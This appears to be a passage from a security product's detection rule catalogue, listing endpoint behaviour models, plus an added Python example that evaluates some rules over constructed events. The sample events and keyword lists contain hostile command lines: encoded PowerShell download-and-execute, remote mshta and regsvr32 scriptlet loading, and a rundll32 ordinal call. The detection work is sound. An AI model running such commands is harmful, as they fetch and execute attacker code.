↳ DLL-SideLoading: DLL side-loading malware used, known artifact of APT27

T1112 - Modify Registry
↳ ChaferAPT-Activity: Chafer APT related activity observed

Models:

• A-EPA-Powershell-Invoke-WebRequest-Domain: Domains called by Powershell executions using Invoke-WebRequest for the asset in the organization.
• A-PC-InstallUtil-exe: EXE file parameter passed to InstallUtil.exe on the asset.
• A-PC-MSBuild-Csproj: CSPROJ file parameter passed to MSBuild.exe on the asset in the organization.
• A-PC-MSBuild-xml: XML file parameter passed to MSBuild.exe on the asset in the organization.
• A-PC-Regsvr32-sct: SCT file parameter passed to Regsvr32.exe on the asset in the organization.
• A-PC-Mshta-Hta: HTA file parameter passed to Mshta.exe on the asset in the organization.
• A-ServiceName-ServiceCmdline: Service executable files on the asset
• A-PC-ParentName-ProcessName: Child processes per parent process.
• A-EPA-USF: Processes per service name for asset
• A-EPA-UP-TEMP: Processes executed from TEMP directories on this asset
• A-EPA-OPP: Parent processes in the organization
• A-EPA-HPP: Parent processes per host on this asset
• A-EPA-ZP: Processes in the zone on asset
• Powershell-ExecPolicy-Bypass: Suspicious powershell execution with '-ExecutionPolicy Bypass' for users in the organization.
• PC-InstallUtil-dll: DLL file parameter passed to InstallUtil.exe
• ParentProcess-P-New: Parent processes for peer group
• Powershell-WMI-O: Users using Powershell WMI
• Powershell-Commands: Powershell commands per user
• Powershell-Advanced: Users who use advanced powershell capabilities
• EPA-UH-Pen: Malicious tools used by user
• EPA-PH: Hosts that executed the 'vssadmin.exe' process
• EPA-PDir: Process executable directories in the organization
• EPA-PG-PS: Powershell executions for the peer group
• EPA-PU-PS: Powershell executions for the user
• EPA-GP: Processes for the peer group
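The catalogue above separates stateless signature rules (a command-line pattern such as an encoded PowerShell payload, a remote .hta passed to mshta.exe, or a rundll32 call by ordinal) from rules built on a model: the "-F" rules fire the first time a user, host or peer group does something, and the "-A" rules fire when the model considers it abnormal. The block below is an added example, not the vendor's rule content or implementation, showing how a handful of the listed process-created rules can be evaluated together with one first-seen model over constructed sample events. The rule names come from the table; the event field names (user, host, parent, process, cmdline), the matching regexes, the parent-process list and the keyword list are assumptions.

```python
"""Added example, not part of this rule catalogue or the vendor's product: a minimal
evaluator for a few of the listed process-created rules plus a first-seen model
of the kind the Models column describes. Field names, regexes and lists are assumed."""
import base64
import re
from collections import defaultdict

# Assumed parent list for A-Sus-Powershell-Invocation-Parent-Proc
# (the catalogue only says "interpreters or unusual programs").
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed keywords looked for inside a decoded -EncodedCommand payload.
PS_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
               "frombase64string")
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|xec|p)\s+bypass", re.I)
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(blob):
    """PowerShell -EncodedCommand payloads are base64 over UTF-16LE text."""
    try:
        return base64.b64decode(blob).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def signature_rules(ev):
    """Stateless rules: decided from the fields of a single event."""
    hits = []
    proc, cmd, parent = ev["process"].lower(), ev["cmdline"], ev["parent"].lower()
    if proc == "powershell.exe":
        if parent in SCRIPT_PARENTS:
            hits.append("A-Sus-Powershell-Invocation-Parent-Proc")
        if re.search(r"\\appdata\\", cmd, re.I):
            hits.append("A-Powershell-Script-AppData")
        if re.search(r"invoke-webrequest", cmd, re.I):
            hits.append("PowerShell-Invoke-WebRequest")
        m = ENCODED_RE.search(cmd)
        if m:
            hits.append("A-Sus-Encoded-PS-CmdLine")
            decoded = decode_encoded_command(m.group(1)).lower()
            if any(k in decoded for k in PS_KEYWORDS):
                hits.append("A-Base64-Powershell-CmdLine-Keywords")
    elif proc == "mshta.exe" and re.search(r"https?://\S+\.hta", cmd, re.I):
        hits.append("A-BinExec-HTA-Remote")
    elif proc == "regsvr32.exe" and re.search(r"/i:https?://|scrobj\.dll", cmd, re.I):
        hits.append("A-Regsvr32-Suspicious-Cmd")
    elif proc == "rundll32.exe" and re.search(r",\s*#\d+", cmd):
        hits.append("A-Ordinal-Rundll32-Call")
    return hits


class FirstSeenModel:
    """Remembers what each scope (user, host, ...) has done and reports whether a
    value is new. The "-F" rules key on exactly this; the "-A" (abnormal) rules
    would additionally need frequency statistics, which this sketch omits."""

    def __init__(self):
        self._seen = defaultdict(set)

    def observe(self, scope, value):
        is_new = value not in self._seen[scope]
        self._seen[scope].add(value)
        return is_new


def stateful_rules(ev, model):
    """Rules that combine a signature with the first-seen model."""
    hits = []
    proc, cmd, parent = ev["process"].lower(), ev["cmdline"], ev["parent"].lower()
    if proc == "powershell.exe":
        if model.observe(("user-powershell", ev["user"]), proc):
            hits.append("EPA-PU-PS-F")
        if BYPASS_RE.search(cmd) and model.observe(("user-execpolicy-bypass", ev["user"]), True):
            hits.append("Powershell-ExecPolicy-Bypass-F")
    if model.observe(("host-parent-process", ev["host"]), (parent, proc)):
        hits.append("A-EPA-HPP-F")
    return hits


def run_detections(events, baseline=()):
    """Train the model on baseline events (alerts discarded), then score the live events.
    Without a baseline every first-seen rule fires on everything, which is the usual
    reason behavioural models need a training window before they alert."""
    model = FirstSeenModel()
    for ev in baseline:
        stateful_rules(ev, model)
    return [sorted(signature_rules(ev) + stateful_rules(ev, model)) for ev in events]


def event(user, host, parent, process, cmdline):
    return {"user": user, "host": host, "parent": parent, "process": process, "cmdline": cmdline}


# Constructed sample telemetry (not real logs); 198.51.100.0/24 is a documentation range.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')".encode("utf-16-le")
).decode()
BASELINE_EVENTS = [event("carol", "ws03", "explorer.exe", "chrome.exe", "chrome.exe")]
SAMPLE_EVENTS = [
    event("alice", "ws01", "explorer.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\u.ps1"),
    event("alice", "ws01", "winword.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc " + ENC),
    event("bob", "ws02", "cmd.exe", "mshta.exe", "mshta.exe http://198.51.100.7/p.hta"),
    event("bob", "ws02", "cmd.exe", "regsvr32.exe", "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
    event("bob", "ws02", "cmd.exe", "rundll32.exe", r"rundll32.exe C:\Windows\Temp\a.dll,#2"),
    event("carol", "ws03", "explorer.exe", "chrome.exe", "chrome.exe"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, run_detections(SAMPLE_EVENTS, BASELINE_EVENTS)):
        print(f"{ev['host']:5} {ev['process']:15} {hits or '-'}")
```

The last sample event is identical to the baseline event, so it produces no alert once the model has been trained; run `run_detections(SAMPLE_EVENTS)` without the baseline and A-EPA-HPP-F fires on it too, which is the false-positive behaviour a "-F" rule shows on a fresh asset.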